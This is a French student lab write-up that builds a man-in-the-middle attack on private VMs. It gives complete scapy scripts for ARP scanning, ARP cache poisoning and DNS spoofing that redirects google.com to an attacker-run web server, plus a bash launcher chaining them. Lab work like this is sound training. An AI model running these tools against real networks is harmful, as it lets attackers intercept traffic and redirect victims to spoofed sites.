

## Sécu offensive : MITM

### Présentation

Le but de ce sujet est de mobiliser vos connaissances au sujet d'ARP et de DNS pour mettre en place une attaque de type Man in the Middle.

L'idée est la suivante : 

- utiliser une technique d'ARP poisoning pour mettre en place un MITM
- une fois en MITM, intercepter les requêtes DNS des victimes afin d'éventuellement y répondre de façon fallacieuse

Pour ce faire, il sera nécessaire de :

- développer ! c'est un sujet de dév, je vous conseille d'utiliser le langage Python et la librairie scapy pour faire ça
- asseoir vos connaissances sur les protocoles réseau impliqués
- travailler avec des VMs, dans un réseau privé (ne faites pas ça sur le réseau YNOV ou autre réseau public)

### Livrable

Les livrables attendus :

- dépôt git avec le code
- `README.md` qui explique comment mettre en place l'attaque

### Installation

Sur les deux VM (eve & marcel):

Python: 
```bash
paja444@eve:~$ sudo apt update && sudo apt upgrade
```
```bash
paja444@eve:~$ sudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev wget libbz2-dev
```
```bash
paja444@eve:~$ wget https://www.python.org/ftp/python/3.10.0/Python-3.10.0.tgz
```
```bash
paja444@eve:~$ tar -xf Python-3.10.*.tgz
```
check
```bash
```bash
paja444@eve:~/Python-3.10.0$ ./configure --enable-optimizations
```
```bash
paja444@eve:~/Python-3.10.0$ sudo make altinstall
```
```bash
paja444@eve:~/tp_leo/5$ sudo apt install python3-pip
```
Scapy Modul:
```bash
paja444@eve:~/tp_leo/5$ pip3 install scapy
```

Sur la vm eve:

install netfilterqueue
```bash
sudo apt install libnfnetlink-dev libnetfilter-queue-dev
```
```bash
pip3 install nfqp3
```

### Configuration

#### Definir les ip statique des vm:
- router
```bash
paja444@router:~$ sudo nano /etc/network/interfaces
```
```bash
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback
auto enp0s3
iface enp0s3 inet static
 address 10.3.1.254
 netmask 255.255.255.0
```
- eve
```bash
paja444@eve:~$ sudo nano /etc/network/interfaces
```
```bash
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback
auto enp0s8
iface enp0s8 inet static
 address 10.3.1.11
 netmask 255.255.255.0
 gateway 10.3.1.254
```
- marcel
```bash
paja444@marcel:~$ sudo nano /etc/network/interfaces
```
```bash
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback
auto enp0s8
iface enp0s8 inet static
 address 10.3.1.12
 netmask 255.255.255.0
 gateway 10.3.1.254
```

activer le routage
```bash
paja444@router:~$ sudo iptables -t nat -A POSTROUTING -o enp0s8 -j MASQUERADE
```
#### Configuration Page Web

sur le vps

- configuration serveur Flask
```bash
paja444@Alpagame:~/TP_leo_5_MITM/tp_leo/5/web$ cat serverFlask.py 
```
```bash
#!/usr/bin/env python3  Line 1
# -*- coding: utf-8 -*- Line 2
#----------------------------------------------------------------------------
# Created By  : Alexandre Pajak
# Created Date: 23/10/2022
# version ='1.0'
# description : simple Flask server for ARP fishing
# ---------------------------------------------------------------------------

from flask import Flask, render_template

app = Flask(__name__)


@app.route("/")
def index():
    return render_template("index.html")

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=True)
```
```bash
paja444@eve:~/tp_leo/5/web/static$ sudo nano css/
```
```bash
h1 {
    border: 2px #eee solid;
    color: red;
    text-align: center;
    padding: 10px;
}

```
```bash
paja444@eve:~/tp_leo/5/web/templates$ sudo nano index.html
```
```bash
<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="{{ url_for('static', filename= 'css/style.css') }}">
    <title>MITM</title>
</head>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>MITM</title>
</head>
<body>
   <h1>Coucou Petite Perruche</h1>
</body>
</html>
```
```bash
paja444@Alpagame:~$ sudo nano /etc/systemd/system/mitm.service
```
```bash
[Unit]
Description=MITM-Flask
[Install]
WantedBy=multi-user.target
[Service]
Type=simple
User=paja444
PermissionsStartOnly=true
ExecStart=/usr/bin/python3 /home/paja444/TP_leo_5_MITM/tp_leo/5/web/serverFlask.py
Restart=on-failure
```
```bash
paja444@Alpagame:~$ sudo systemctl enable mitm.service 
```
```bash
paja444@Alpagame:~$ sudo systemctl start mitm.service 
```

- configuration nginx
```bash
paja444@Alpagame:~$ sudo nano /etc/nginx/conf.d/mitmLeo.conf 
```
```bash
upstream backend_flask1{
  server 127.0.0.1:5000;
}

server {
    listen 80 default_server;
    server_name _;
    return 301 https://alpagam.com$request_uri;
}
server {
  listen 443 ssl;
  ssl_certificate /etc/letsencrypt/live/alpagam.com-0001/fullchain.pem;
  ssl_certificate_key /etc/letsencrypt/live/alpagam.com-0001/privkey.pem;
  server_name www.alpagam.com alpagam.com;

  location / {
    include proxy_params;
    proxy_pass http://backend_flask1;
  }
}
```
```bash
paja444@Alpagame:~$ sudo systemctl reload nginx.service 
```


#### configuration eve


- scan réseau:
```bash
paja444@eve:~/tp_leo/5$ sudo nano scan.py 
```
```bash
#!/usr/bin/env python3  Line 1
# -*- coding: utf-8 -*- Line 2
#----------------------------------------------------------------------------
# Created By  : Alexandre Pajak
# Created Date: 23/10/2022
# version ='1.0'
# description : ARP network scan 
# ---------------------------------------------------------------------------
import scapy.all as scapy
import sys


def scan(network_address="10.3.1.1/24"):
    request = scapy.ARP()

    request.pdst = network_address
    broadcast = scapy.Ether()

    broadcast.dst = "ff:ff:ff:ff:ff:ff"

    request_broadcast = broadcast / request
    clients = scapy.srp(request_broadcast, timeout=1)[0]
    for element in clients:
        print(element[1].psrc + "        " + element[1].hwsrc)


if __name__ == "__main__":
    try:
        scan(sys.argv[1])
    except IndexError as e:
        print("scan as default network 10.3.1.1/24")
        scan()
```
- ARP spoofing

```bash
#!/usr/bin/env python3  Line 1
# -*- coding: utf-8 -*- Line 2
#----------------------------------------------------------------------------
# Created By  : Alexandre Pajak
# Created Date: 23/10/2022
# version ='1.0'
# description : ARP spoof
# ---------------------------------------------------------------------------
from scapy.all import Ether, ARP, srp, send
import time
import sys


def enable_ip_route():
    """
    Enables IP route ( IP Forward ) in linux-based distro
    """
    file_path = "/proc/sys/net/ipv4/ip_forward"
    with open(file_path) as f:
        if f.read() == 1:
            # already enabled
            return
    with open(file_path, "w") as f:
        print(1, file=f)

def get_mac(ip):
    """
    Returns MAC address of any device connected to the network
    If ip is down, returns None instead
    """
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=3, verbose=0)
    if ans:
        print(ans[0][1].psrc)
        return ans[0][1].src


def spoof(target_ip, host_ip, verbose=True):
    """
    Spoofs `target_ip` saying that we are `host_ip`.
    it is accomplished by changing the ARP cache of the target (poisoning)
    """
    # get the mac address of the target
    target_mac = get_mac(target_ip)
    # craft the arp 'is-at' operation packet, in other words; an ARP response
    # we don't specify 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op="is-at")
    # send the packet
    # verbose = 0 means that we send the packet without printing any thing
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))


def restore(target_ip, host_ip, verbose=True):
    """
    Restores the normal process of a regular network
    This is done by sending the original informations
    (real IP and MAC of `host_ip` ) to `target_ip`
    """
    # get the real MAC address of target
    target_mac = get_mac(target_ip)
    # get the real MAC address of spoofed (gateway, i.e router)
    host_mac = get_mac(host_ip)
    # crafting the restoring packet
    arp_response = ARP(
        pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at"
    )
    # sending the restoring packet
    # to restore the network to its normal process
    # we send each reply seven times for a good measure (count=7)
    send(arp_response, verbose=0, count=7)
    if verbose:
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))


if __name__ == "__main__":
    # victim ip address
    target = sys.argv[1]
    # gateway ip address
    host = sys.argv[2]
    # print progress to the screen
    verbose = True
    # enable ip forwarding
    enable_ip_route()
    try:
        while True:
            # telling the `target` that we are the `host`
            spoof(target, host, verbose)
            # telling the `host` that we are the `target`
            spoof(host, target, verbose)
            # sleep for one second
            time.sleep(1)
    except KeyboardInterrupt:
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        restore(target, host)
        restore(host, target)
        print("ciao..")
```
- DNS spoofing

```bash
paja444@eve:~/tp_leo/5$ sudo nano DNSSpoofing.py 
```
```bash
#!/usr/bin/env python3  Line 1
# -*- coding: utf-8 -*- Line 2
#----------------------------------------------------------------------------
# Created By  : Alexandre Pajak
# Created Date: 23/10/2022
# version ='1.0'
# description : DNS spoof
# ---------------------------------------------------------------------------
import os
import logging as log
from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
from netfilterqueue import NetfilterQueue
import sys


class DnsSpoof:
    def __init__(self, hostDict, queueNum):
        self.hostDict = hostDict
        self.queueNum = queueNum
        self.queue = NetfilterQueue()

    def __call__(self):
        log.info("Spoofing....")
        os.system(f"iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}")
        self.queue.bind(self.queueNum, self.callBack)
        try:
            self.queue.run()
        except KeyboardInterrupt:
            os.system(f"iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}")
            log.info("[!] iptable rule flushed")

    def callBack(self, packet):
        scapyPacket = IP(packet.get_payload())
        if scapyPacket.haslayer(DNSRR):
            try:
                log.info(f"[original] { scapyPacket[DNSRR].summary()}")
                log.info(f"[request] {scapyPacket[DNSRR].rrname}")
                queryName = scapyPacket[DNSQR].qname
                hostDict[queryName] = my_IP
                if queryName in self.hostDict:
                    scapyPacket[DNS].an = DNSRR(
                        rrname=queryName, rdata=self.hostDict[queryName]
                    )
                    scapyPacket[DNS].ancount = 1
                    del scapyPacket[IP].len
                    del scapyPacket[IP].chksum
                    del scapyPacket[UDP].len
                    del scapyPacket[UDP].chksum
                    log.info(f"[modified] {scapyPacket[DNSRR].summary()}")
                else:
                    log.info(f"[not modified] { scapyPacket[DNSRR].rdata }")
            except IndexError as error:
                log.error(error)
            packet.set_payload(bytes(scapyPacket))
        return packet.accept()


if __name__ == "__main__":
    my_IP = sys.argv[1]
    try:
        # faire un alog de récupération des requetes dns les plus fréquament utilisées
        hostDict = {
            b"google.com.": "54.37.153.179",
        }
        queueNum = 1
        log.basicConfig(format="%(asctime)s - %(message)s", level=log.INFO)
        spoof = DnsSpoof(hostDict, queueNum)
        spoof()
    except OSError as error:
        log.error(error)
```
- script principal MITM

```bash
paja444@eve:~/tp_leo/5$ sudo nano MITM.sh
```
```bash
# run ARP & DNS Spoof script
#!/bin/bash
# paja444

# Script Vars:
IP_target_1="10.3.1.12"
IP_Gateway="10.3.1.254";
IP_redirect="54.37.153.179";
NETWORK_ADDR="10.3.1.1/24"
SCAN_script_path="/home/paja444/tp_leo/5/scan.py";
ARP_script_path="/home/paja444/tp_leo/5/ARPSpoofing.py";
DNS_script_path="/home/paja444/tp_leo/5/DNSSpoofing.py";

# Preflight checks:
if [ -f "$ARP_script_path" ]; then
    echo "$ARP_script_path exists."
else 
    echo "$ARP_script_path does not exist."
    exit 1
fi
if [ -f "$DNS_script_path" ]; then
    echo "$DNS_script_path exists."
else 
    echo "$DNS_script_path does not exist."
    exit 1
fi

# Main function:
main() {

    echo "Welcom to MITM !"

    #run network scan
    read -e -i "$NETWORK_ADDR" -p "select an network address for start scan: " input
    NETWORK_ADDR="${input:-$NETWORK_ADDR}"
    python3 $SCAN_script_path $NETWORK_ADDR

    read -e -i "$IP_target_1" -p "select a target_1 ip: " input
    IP_target_1="${input:-$IP_target_1}"

    read -e -i "$IP_Gateway" -p "select a target_2 ip: " input
    IP_Gateway="${input:-$IP_Gateway}"

    echo "start DNS spoofing between $IP_target_1 and $IP_Gateway.."
    trap "exit" INT TERM ERR
    trap "kill 0" EXIT
    if python3 $ARP_script_path $IP_target_1 $IP_Gateway & then
    echo "$ARP_script_path is running."
    else
        echo "$ARP_script_path failed"
    fi
    if python3 $DNS_script_path $IP_redirect & then
    echo "$DNS_script_path is running."
    else
        echo "$DNS_script_path failed"
    fi
    wait
    }
main
```

### Utilisation:

```bash
paja444@eve:~/tp_leo/5$ sudo bash MITM.sh 
```
Il ne resteplus qu'a suivre les instruction du script !

![easy_meme](./pics/easy.jpg)

